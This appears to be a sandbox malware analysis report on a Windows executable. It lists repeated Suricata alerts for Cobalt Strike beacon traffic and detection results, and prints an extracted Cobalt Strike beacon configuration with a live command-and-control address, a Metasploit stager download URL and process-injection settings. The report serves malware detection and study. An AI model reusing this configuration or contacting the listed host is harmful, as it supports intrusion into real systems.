2024-10-23T17:28:20.979463+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49866	79.124.58.130	7698	TCP
2024-10-23T17:28:22.327846+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49867	79.124.58.130	7698	TCP
2024-10-23T17:28:23.363462+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49868	79.124.58.130	7698	TCP
2024-10-23T17:28:24.371462+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49869	79.124.58.130	7698	TCP
2024-10-23T17:28:25.374228+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49870	79.124.58.130	7698	TCP
2024-10-23T17:28:26.391798+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49871	79.124.58.130	7698	TCP
2024-10-23T17:28:27.434341+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49872	79.124.58.130	7698	TCP
2024-10-23T17:28:28.438545+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49873	79.124.58.130	7698	TCP
2024-10-23T17:28:29.455492+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49874	79.124.58.130	7698	TCP
2024-10-23T17:28:30.607171+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49875	79.124.58.130	7698	TCP
2024-10-23T17:28:31.638169+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49876	79.124.58.130	7698	TCP
2024-10-23T17:28:32.655986+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49877	79.124.58.130	7698	TCP
2024-10-23T17:28:33.701720+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49878	79.124.58.130	7698	TCP
2024-10-23T17:28:34.733787+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49879	79.124.58.130	7698	TCP
2024-10-23T17:28:35.755641+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49880	79.124.58.130	7698	TCP
2024-10-23T17:28:36.772070+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49881	79.124.58.130	7698	TCP
2024-10-23T17:28:37.779606+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49882	79.124.58.130	7698	TCP
2024-10-23T17:28:38.845277+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49883	79.124.58.130	7698	TCP
2024-10-23T17:28:39.861335+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49884	79.124.58.130	7698	TCP
2024-10-23T17:28:40.913478+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49885	79.124.58.130	7698	TCP
2024-10-23T17:28:42.494449+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49886	79.124.58.130	7698	TCP
2024-10-23T17:28:43.498618+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49887	79.124.58.130	7698	TCP
2024-10-23T17:28:44.534467+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49888	79.124.58.130	7698	TCP
2024-10-23T17:28:45.575608+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49889	79.124.58.130	7698	TCP
2024-10-23T17:28:46.586053+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49890	79.124.58.130	7698	TCP
2024-10-23T17:28:47.596788+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49891	79.124.58.130	7698	TCP
2024-10-23T17:28:48.600519+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49892	79.124.58.130	7698	TCP
2024-10-23T17:28:49.820834+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49893	79.124.58.130	7698	TCP
2024-10-23T17:28:50.833141+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49894	79.124.58.130	7698	TCP
2024-10-23T17:28:51.889136+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49895	79.124.58.130	7698	TCP
2024-10-23T17:28:52.896267+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49896	79.124.58.130	7698	TCP
2024-10-23T17:28:54.102550+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49897	79.124.58.130	7698	TCP
2024-10-23T17:28:55.106382+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49898	79.124.58.130	7698	TCP
2024-10-23T17:28:56.127618+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49899	79.124.58.130	7698	TCP
2024-10-23T17:28:57.139538+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49900	79.124.58.130	7698	TCP
2024-10-23T17:28:58.154534+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49901	79.124.58.130	7698	TCP
2024-10-23T17:28:59.323597+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49902	79.124.58.130	7698	TCP
2024-10-23T17:29:00.340040+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49903	79.124.58.130	7698	TCP
2024-10-23T17:29:01.345626+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49904	79.124.58.130	7698	TCP
2024-10-23T17:29:02.372581+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49905	79.124.58.130	7698	TCP
2024-10-23T17:29:03.849528+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49906	79.124.58.130	7698	TCP
2024-10-23T17:29:04.869407+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49907	79.124.58.130	7698	TCP
2024-10-23T17:29:05.875870+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49908	79.124.58.130	7698	TCP
2024-10-23T17:29:06.902957+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49909	79.124.58.130	7698	TCP
2024-10-23T17:29:07.921685+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49910	79.124.58.130	7698	TCP
2024-10-23T17:29:09.033439+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49911	79.124.58.130	7698	TCP
2024-10-23T17:29:10.055694+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49912	79.124.58.130	7698	TCP
2024-10-23T17:29:11.045829+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49913	79.124.58.130	7698	TCP
2024-10-23T17:29:12.086129+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49914	79.124.58.130	7698	TCP
2024-10-23T17:29:13.097713+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49915	79.124.58.130	7698	TCP
2024-10-23T17:29:14.134291+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49916	79.124.58.130	7698	TCP
2024-10-23T17:29:15.143502+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49917	79.124.58.130	7698	TCP
2024-10-23T17:29:16.179586+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49918	79.124.58.130	7698	TCP
2024-10-23T17:29:17.203212+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49919	79.124.58.130	7698	TCP
2024-10-23T17:29:18.222578+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49920	79.124.58.130	7698	TCP
2024-10-23T17:29:19.507643+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49921	79.124.58.130	7698	TCP
2024-10-23T17:29:20.524138+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49922	79.124.58.130	7698	TCP
2024-10-23T17:29:21.558015+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49923	79.124.58.130	7698	TCP
2024-10-23T17:29:22.572219+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49924	79.124.58.130	7698	TCP
2024-10-23T17:29:23.584747+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49925	79.124.58.130	7698	TCP
2024-10-23T17:29:24.592453+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49926	79.124.58.130	7698	TCP
2024-10-23T17:29:25.607571+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49927	79.124.58.130	7698	TCP
2024-10-23T17:29:26.617072+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49928	79.124.58.130	7698	TCP
2024-10-23T17:29:27.621174+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49929	79.124.58.130	7698	TCP
2024-10-23T17:29:29.410434+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49930	79.124.58.130	7698	TCP
2024-10-23T17:29:30.407262+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49931	79.124.58.130	7698	TCP
2024-10-23T17:29:31.447589+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49932	79.124.58.130	7698	TCP
2024-10-23T17:29:32.450167+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49933	79.124.58.130	7698	TCP
2024-10-23T17:29:33.474198+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49934	79.124.58.130	7698	TCP
2024-10-23T17:29:34.478533+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49935	79.124.58.130	7698	TCP
2024-10-23T17:29:35.677989+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49936	79.124.58.130	7698	TCP
2024-10-23T17:29:36.868472+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49937	79.124.58.130	7698	TCP
2024-10-23T17:29:37.890344+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49938	79.124.58.130	7698	TCP
2024-10-23T17:29:38.901644+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49939	79.124.58.130	7698	TCP
2024-10-23T17:29:39.897507+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.8	49940	79.124.58.130	7698	TCP

ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-23T17:25:36.588106+0200	2035442	1	A Network Trojan was detected	79.124.58.130	7698	192.168.2.8	49705	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 2HSalvXIJE.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 7698, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "79.124.58.130,/en_US/all.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 1158277545, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0; msn OptimizedIE8;ENUS)\r\n", "Type": "Metasploit Download", "URL": "http://79.124.58.130/aiHK"}

Multi AV Scanner detection for submitted file

Source: 2HSalvXIJE.exe

ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 2HSalvXIJE.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03A91184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	0_2_03A91184
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC2020 CryptGenRandom,	0_2_03AC2020
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC2010 CryptReleaseContext,	0_2_03AC2010

Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AA9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_03AA9220
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AA1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_03AA1C30

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49708 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49727 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49709 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49724 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49739 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49731 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49735 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49729 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49738 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49757 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49747 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49712 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49732 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49743 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49753 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49711 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49725 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49755 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49734 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49760 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49720 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49749 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49707 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49750 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49762 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49748 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49706 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49768 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49713 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49763 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49775 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49715 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49710 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49756 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49736 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49765 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49723 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49752 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49722 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49767 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49716 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49772 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49742 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49746 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49761 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49777 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49764 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49714 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49789 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49793 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49730 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49788 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49770 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49769 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49807 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49802 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49808 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49797 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49783 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49759 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49803 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49751 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49810 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49814 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49811 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49816 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49792 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49815 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49786 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49800 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49718 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49818 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49799 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49817 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49790 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49798 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49740 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49741 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49813 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49771 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49745 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49819 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49812 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49774 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49780 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49791 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49726 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49773 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49778 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49728 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49787 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49782 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49779 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49737 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49820 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49823 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49801 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49795 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49822 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49836 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49834 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49831 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49744 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49840 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49854 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49776 -> 79.124.58.130:7698
